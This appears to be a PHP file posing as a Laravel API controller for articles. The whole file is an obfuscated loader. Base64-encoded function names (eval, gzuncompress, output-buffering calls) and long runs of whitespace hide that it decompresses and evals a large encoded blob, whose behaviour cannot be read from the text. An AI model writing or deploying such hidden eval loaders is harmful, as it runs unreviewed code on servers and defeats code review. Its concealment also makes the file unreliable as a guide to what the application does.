<?php 
        $__='printf';$_='Loading app/Http/Controllers/Api/ArtikelController.php';
        



























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































                                                                                                                                                                                                                     $________;
